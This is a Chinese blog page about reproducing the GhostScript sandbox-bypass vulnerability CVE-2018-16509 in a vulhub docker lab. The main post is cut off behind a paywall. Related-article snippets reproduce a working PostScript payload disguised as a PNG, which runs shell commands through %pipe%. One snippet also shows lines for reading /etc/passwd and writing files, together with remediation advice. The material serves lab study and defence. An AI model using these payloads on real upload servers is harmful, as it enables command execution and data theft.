GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

最新推荐文章于 2024-09-08 14:33:17 发布

原创

最新推荐文章于 2024-09-08 14:33:17 发布 · 1.6k 阅读

0 ·

CC 4.0 BY-SA版权

本文介绍了GhostScript的一个安全漏洞，该漏洞允许攻击者通过构造恶意的图片内容绕过安全沙箱，导致命令执行、文件读取和删除。攻击者在文件上传过程中利用GhostScript处理图片时可触发此漏洞。修复方案包括限制GhostScript的某些代码解析权限。

漏洞概述

①漏洞简介

8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。

②GhostScript

GhostScript 是一套建基于Adobe、PostScript及可移植文档格式（PDF）的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印 PS、EPS、PDF 文件，GhostScript 被许多图片处理库所使用。

③漏洞影响

在文件上传过程中，有可能会用GhostScript来处理图片，可以伪装图片利用GhostScript执行命令。

漏洞复现

①环境搭建

使用docker启动ghostscript_CVE-2018-16509环境

root@kali:/home/zj/桌面/vulhub/ghostscript/CVE-2018-16509# docker-compose up -d

服务启动后，访问http://172.17.0.1:8080，可看见文件上传按钮。

②浏览poc.png，并提交查询

poc.png

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /Ou

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Redredredfish

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509

qq_51577576的博客

12-07

1014

[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时，程序没有正确的检测restoration of privilege（权限恢复），导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。

GhostScript 沙箱绕过（CVE-2018-16509）

qq_62056583的博客

07-29

430

① 漏洞成因，在2018年Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。即用户可以通过图片隐写的方式构造payload绕过检测构造命令执行。② 因为GhostScript被许多图片处理库使用，默认情况是GhostScript通过传入图片内容将其分发到不同的处理算法中当然也包括GhostScript。

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

HMX404 2024.01.28
不是，你都执行了一遍id > /tmp/success，然后查看，那肯定有啊！！

vulhub漏洞复现55_python

weixin_44193247的博客

02-11

869

vulhub漏洞复现练习篇

GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509

她叫常玉莹

07-27

1103

2018年8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。 GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-19475）复现

HEAVEN569的博客

06-21

752

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-19475）复现

GhostScript 沙箱绕过（命令执行）漏洞 CVE-2018-16509 漏洞复现

ADummy的博客

02-24

401

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509） by ADummy 0x00利用路线构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞： http://seclists.org/oss-sec/2018/q3/142 https://b

GhostScript 沙箱绕过命令执行漏洞

m0_63241485的博客

08-26

1425

当dorestore退出时，LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是，在restore之后，.setuserparams方法执行之前，可能会抛出StackOverflowError栈溢出错误，不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...

GhostScript 沙箱绕过（命令执行）CVE-2018-16509/6116/19475/ 漏洞

weixin_51387754的博客

11-24

1155

标题 browse——ghost.png 提交 submit Query

【漏洞靶场】--GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

hello word的博客

01-06

2348

环境 exp 把如下代码保存为一个png文件。 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%ls / > /tmp/success && cat /tmp/success) currentdevice putdeviceprops 上传，执行l

docker-ghostscript

04-06

Ghostscript泊坞窗映像（atyasu / ghostscript） Ghostscript是一套基于PostScript和PDF页面描述语言的解释器的软件。它的主要目的是光栅化或渲染此类页面描述语言文件，以显示或打印文档页面，以及在PostScript和PDF文件之间进行转换。用法 docker run --rm -v ` pwd ` :/app -w /app atyasu/ghostscript 标签标签尺寸最新的 9 通过叉子来自： :

vulhub GhostScript 沙箱绕过（CVE-2018-16509）

2301_80402555的博客

09-08

381

cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录。docker-compose up -d #启动靶场。docker ps #查看容器信息。

buuctf [GhostScript]CVE-2018-16509

qq_1873822的博客

03-31

722

漏洞描述 GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。 https://blog.youkuaiyun.com/JiangBuLiu/article/details/95061202 漏洞影响 Ghostscript 9.24之前版本漏洞复现直接上传一个png打poc %!PS userdict /setpagedevice undef save legal {

Python 渗透测试：GhostScript 沙箱绕过.（CVE-2018-16509）

网络安全领域___专研者.

05-20

1074

GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行。GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞来执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos

vylhub学习文档-GhostScript 沙箱绕过（命令执行）漏洞

ploto_cs的博客

09-11

545

GhostScript 沙箱绕过（命令执行）漏洞一．漏洞介绍（一）编号 CVE-2018-16509 （二）概述 Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式（PDF）的页面描述语言等而编译成的免费软件。 Ghostscript 可以查看及打印 PS、EPS、PDF 文件，支持 PS 的绘图程序一般都很大以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎，GhostScript 被许多图片处理库所使用。（三）适用条件在文件上传过程中，有可

利用Vulnhub复现漏洞 - GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）

JiangBuLiu的博客

07-08

2155

GhostScript 沙箱绕过（命令执行）漏洞（CVE-2018-16509）Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用，如 ImageMagick、Pyt...

CVE-2018-16509 GhostScript 沙箱绕过（命令执行）漏洞

m0_65150886的博客

12-29

614

GhostScript 被许多图片处理库所使用，如 ImageMagick、Python PIL 等，默认情况下这些库会根据图片的内容将其分发给不同的处理方法，其中就包括 GhostScript。8 月 21 号，Tavis Ormandy 通过公开邮件列表，再次指出 GhostScript 的安全沙箱可以被绕过，通过构造恶意的图片内容，将可以造成命令执行、文件读取、文件删除等漏洞。2.上传poc.png，将执行命令id > /tmp/success && cat /tmp/success。

GhostScript沙箱绕过漏洞复现（CVE-2018-16509）

weixin_69925635的博客

07-21

348

GhostScript沙箱绕过漏洞复现（CVE-2018-16509）

Ghostscript命令执行(沙箱绕过)漏洞(CVE-2018-15910)

最新发布

08-08

Ghostscript 是一个广泛使用的处理 PostScript 和 PDF 文件的软件，它被许多图像处理库（如 ImageMagick 和 Python PIL）集成，用于图像转换和渲染。CVE-2018-15910 是 Ghostscript 中的一个沙箱绕过漏洞，攻击者可以利用该漏洞执行任意命令、读取或删除文件，从而对系统造成严重威胁。 ### 漏洞原理 Ghostscript 提供了一个安全沙箱机制，用于限制 PostScript 代码在解析过程中的权限，防止恶意内容对系统造成危害。然而，在 CVE-2018-15910 中，攻击者可以通过构造特定的 PostScript 代码，绕过该沙箱机制，实现对系统资源的非法访问。漏洞的核心在于 Ghostscript 对某些内置操作符的处理方式存在缺陷，攻击者可以利用这些操作符访问受限资源，例如执行系统命令或写入任意文件。具体而言，攻击者可以构造一个恶意的 PostScript 文件，通过 `%pipe%` 或 `%command%` 等特殊文件操作符调用系统命令，从而绕过沙箱限制。由于 Ghostscript 在默认配置下不会对这些操作进行严格限制，攻击者可以借此实现远程代码执行[^1]。 ### 利用方式该漏洞的利用方式通常涉及构造一个包含恶意 PostScript 代码的图片文件（如 PDF 或 EPS 文件），当目标系统使用 Ghostscript 对该文件进行处理时，便会触发漏洞。常见的利用方式包括： 1. **命令执行**：通过 `%pipe%` 操作符调用系统命令，例如执行 `id`、`whoami` 或启动反向 shell。 ```postscript (%pipe%id > /tmp/output) (w) file ``` 2. **文件读取**：通过文件操作符读取敏感文件内容，例如 `/etc/passwd`。 ```postscript (/etc/passwd) (r) file ``` 3. **文件写入**：通过写入特定文件实现持久化控制或进一步攻击。 ```postscript (%pipe%echo "malicious code" > /tmp/malicious.sh) (w) file ``` 攻击者通常会将这些恶意内容嵌入图片文件中，上传至目标系统后，当系统使用 Ghostscript 进行处理时即可触发漏洞。 ### 修复方案针对 CVE-2018-15910，Ghostscript 官方发布了安全更新，修复了沙箱机制中的漏洞。以下是推荐的修复措施： 1. **升级 Ghostscript 版本**：确保使用 Ghostscript 9.24 或更高版本，官方在该版本中修复了多个沙箱绕过漏洞。 2. **限制 Ghostscript 权限**：以最小权限运行 Ghostscript，避免其以 root 权限执行。 3. **禁用危险操作符**：在 Ghostscript 的配置文件中禁用 `%pipe%` 和 `%command%` 等危险操作符，防止其被用于执行系统命令。 4. **输入验证与过滤**：对用户上传的文件进行严格的内容检查，防止恶意 PostScript 代码被解析。 5. **使用替代库**：对于不依赖 Ghostscript 的图像处理任务，考虑使用更安全的替代库或工具链。 ---